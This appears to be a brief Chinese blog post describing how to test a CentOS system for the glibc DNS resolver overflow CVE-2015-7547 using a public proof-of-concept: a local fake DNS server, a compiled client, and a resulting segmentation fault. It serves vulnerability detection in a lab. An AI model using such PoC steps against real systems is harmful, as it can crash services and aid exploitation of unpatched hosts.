libc CVE-2015-7547 检测测试

原创 赤水  2016年2月19日 03:34 阅读 443 次

                                  libc CVE-2015-7547洞的成因及POC使用测试

测试:
    system:centos6.5
    libc version: 2.19
#下载测试代码
git clone https://github.com/fjserna/CVE-2015-7547.git 
根据漏洞描述,我们可以做一个假的DNS Server 作为中间人,来验证该漏洞。
# cat /etc/resolv.conf
nameserver 127.0.0.1
更改DNS 解析为 127.0.0.1,刷新DNS 缓存
/etc/init.d/network restart
/etc/init.d/nscd restart
执行 CVE-2015-7547-poc.py , 注意无需更改 ip_addr 。
python CVE-2015-7547-poc.py 
编译 CVE-2015-7547-client.c , 执行CVE-2015-7547-client,若含有漏洞,会造成Segmentation Fault。
[root@Log2 CVE-2015-7547]# gcc -o CVE-2015-7547-client CVE-2015-7547-client.c
[root@Log2 CVE-2015-7547]# chmod +x CVE-2015-7547-client
[root@Log2 CVE-2015-7547]# ./CVE-2015-7547-client
Segmentation fault (core dumped)

libc CVE-2015-7547漏洞描述详见:https://www.lssin.com/blog/read.html?id=75

 



本文地址: https://blog.lssin.com/readblog/71.html
版权声明:本文为原创文章,版权归  赤水 所有,欢迎分享本文,转载请保留出处!

发表评论


表情